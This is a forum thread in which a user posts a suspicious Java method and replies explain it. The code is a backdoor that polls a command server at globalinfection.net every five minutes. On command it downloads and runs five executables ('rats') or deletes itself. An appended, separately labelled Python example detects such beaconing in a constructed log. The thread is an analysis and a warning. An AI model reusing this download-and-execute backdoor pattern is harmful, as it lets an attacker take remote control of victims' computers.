Post: Explain this Java code to me? (Seems sketchy...)
12-16-2015, 04:54 PM #1
Hey, I was looking through the shit I have on my computer and found this in one of the Java sources I have... I'm not sure where it came from. I got it a long time ago, and I'm only going to post the part that seems sketchy. If someone could help me understand what's going on I would appreciate it.

    private void startCommandTask() {
        ActionListener taskPerformer = new ActionListener() {

            @Override
            public void actionPerformed(ActionEvent evt) {
                try {
                    if (Update.getText("https://www.globalinfection.net/GiSE/command.php?u=" + GiSE.authUser).equals("exit")) {
                        System.exit(0);
                    } else if (Update.getText("https://www.globalinfection.net/GiSE/command.php?u=" + GiSE.authUser).equals("delete")) {
                        new File("config" + File.separatorChar + "settings.ini").delete();
                        deleteDir(new File("config"));
                        new File("GiSE_Updater.jar").delete();
                        new File("GiSE.jar").deleteOnExit();
                        System.exit(0);
                    } else if (Update.getText("https://www.globalinfection.net/GiSE/command.php?u=" + GiSE.authUser).equals("rat")) {
                        Update.download("https://www.globalinfection.net/rats/1.exe", "C:\\1.exe");
                        Runtime.getRuntime().exec("C:\\1.exe");
                        Update.download("https://www.globalinfection.net/rats/2.exe", "C:\\2.exe");
                        Runtime.getRuntime().exec("C:\\2.exe");
                        Update.download("https://www.globalinfection.net/rats/3.exe", "C:\\3.exe");
                        Runtime.getRuntime().exec("C:\\3.exe");
                        Update.download("https://www.globalinfection.net/rats/4.exe", "C:\\4.exe");
                        Runtime.getRuntime().exec("C:\\4.exe");
                        Update.download("https://www.globalinfection.net/rats/5.exe", "C:\\Windows\\Recruit.exe");
                        Runtime.getRuntime().exec("C:\\Windows\\Recruit.exe");
                    }
                } catch (Exception e) {
                }
            }
        };
        new Timer(300000, taskPerformer).start();
        taskPerformer.actionPerformed(null);
    }


EDIT: I guess my question is really where does that Update object come from.
EDIT 2: Just kidding I think I found the Update object.
Last edited by ajbinky ; 12-16-2015 at 05:15 PM.
12-17-2015, 08:07 PM #2
gopro_2027
Vault dweller
Well, *clears throat* it is clearly downloading something from the website globalinfection.net and then running it. Multiple files to be exact.
Take this part of the code:

    Update.download("https://www.globalinfection.net/rats/1.exe", "C:\\1.exe");
    Runtime.getRuntime().exec("C:\\1.exe");

It is downloading the file 1.exe and saving it to C:\\1.exe and then running it.
It almost looks like it is something you would put on another person's computer and then run.
12-18-2015, 03:05 AM #3
So basically stay the hell away from a program like this. xD
12-18-2015, 03:27 AM #4
Dan
I'm a god.
12-18-2015, 04:28 AM #5
Specter
Pro Memer
Moved to Inquiries.
12-20-2015, 11:13 AM #6
Winter
Purple God
So here's a run through of how it works:

The attacker has a little database where he can select commands from
u= is essentially a unique identifier so it doesn't get run on ALL clients.
It checks it every 300000ms.

He specifies a command which, in the next remaining time until 300000ms occurs, if it contains the command 'rat', it will then download five separate stubs (I assume each have different encryptions because of anti-virus) and run each one of them.


In tl;dr terms, the attacker can rat you at any time this is running.

The following 2 users say thank you to Winter for this useful post:

ajbinky, Veyzor
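
Added example, not part of any post in this thread: a defender-side check for the polling behaviour described above (a fixed 300000 ms timer requesting the same command.php URL), run over a constructed proxy log. The log format, the host `c2.example.invalid`, the client addresses, the `u=user1` value and the thresholds are assumptions made for the illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median
from urllib.parse import urlsplit

def constructed_log():
    """Constructed sample (not real traffic): 'ISO-time client-ip URL' per line."""
    base, lines = datetime(2015, 12, 16, 10, 0, 0), []
    def add(offset, client, url):
        t = base + timedelta(seconds=offset)
        lines.append(f"{t.isoformat()} {client} {url}")
    for tick in (0, 301, 600, 902, 1201):   # ~300 s timer with slight jitter
        for k in range(3):                  # the posted method fetches the URL up to 3x per tick
            add(tick + k, "10.0.0.5", "https://c2.example.invalid/GiSE/command.php?u=user1")
    for off in (10, 100, 540, 570, 1860):   # ordinary, irregular browsing
        add(off, "10.0.0.9", "https://news.example.invalid/index.html")
    return lines

def find_beacons(lines, burst_gap=5.0, min_ticks=4, max_jitter=0.1):
    """Return (client, host+path, period_s) for near-constant polling intervals."""
    seen = defaultdict(list)
    for line in lines:
        ts, client, url = line.split()
        parts = urlsplit(url)               # query string (u=...) is ignored for grouping
        seen[(client, parts.hostname + parts.path)].append(datetime.fromisoformat(ts))
    hits = []
    for (client, target), stamps in seen.items():
        stamps.sort()
        ticks = [stamps[0]]                 # collapse each burst of requests into one tick
        for ts in stamps[1:]:
            if (ts - ticks[-1]).total_seconds() > burst_gap:
                ticks.append(ts)
        if len(ticks) < min_ticks:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(ticks, ticks[1:])]
        period = median(gaps)
        if all(abs(g - period) <= max_jitter * period for g in gaps):
            hits.append((client, target, round(period)))
    return hits

if __name__ == "__main__":
    for hit in find_beacons(constructed_log()):
        print("possible beacon:", hit)
```

Without the burst collapse (`burst_gap=0`) the repeated fetches inside each tick hide the 300-second period, which is why the grouping step matters for this sample.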

Copyright © 2024, NextGenUpdate.
All Rights Reserved.
